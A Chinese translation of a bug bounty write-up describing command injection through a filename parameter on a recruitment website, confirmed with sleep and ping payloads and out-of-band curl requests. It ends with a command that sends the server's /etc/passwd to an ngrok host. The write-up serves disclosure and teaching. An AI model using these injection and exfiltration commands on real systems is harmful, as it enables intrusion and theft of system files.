Command Injection Poc(命令注入)

原文:https://medium.com/bugbountywriteup/command-injection-poc-72cc3743f10d

作者: NoGe

漏洞类型:命令注入

.......

 

在我测试一个招聘网站的时候,非常有趣的事情是,我发现一个文件名参数可以进行注入

下面是整个漏洞复测流程:

1、首先在这个name参数处输入''sleep 5' ,发现这个响应包延迟了5-6秒,以下是具体测试图片

2、我再次输入命令‘sleep 10’去验证,发现这个响应包延迟了10-11秒,这里我确定是存在漏洞了,以下是具体测试图片

3、我在name参数再次注入‘ping -c 5 <我的服务器ip>’这条命令(这个命令执行成功意味着发送一个5秒的icmp包文到我的服务器上),并且在我的服务器上执行tcpdump -i -n icmp抓包

4、上述操作执行完成之后,看我的服务器上成功接收到了icmp响应,已经能够成功的判断name参数存在命令注入漏洞

 

5、接下来我继续做另外一个测试,我在我的vps上面使用ngrok搭建web服务(./ngrok http 80),并且我在这个name参数处执行‘curl bd1b378d.ngrok.io’命令

6、现在我们我的ngrok的web页面上看到了来自000.000.39.169这个ip地址的响应包

7、接下来我们可以使用命令‘curl -F shl=@/etc/passwd blablabla.ngrok.io’ 来读取服务器的/etc/passwd文件并发送到我的ngrok上面

 

 

你可能感兴趣的:(Web渗透测试)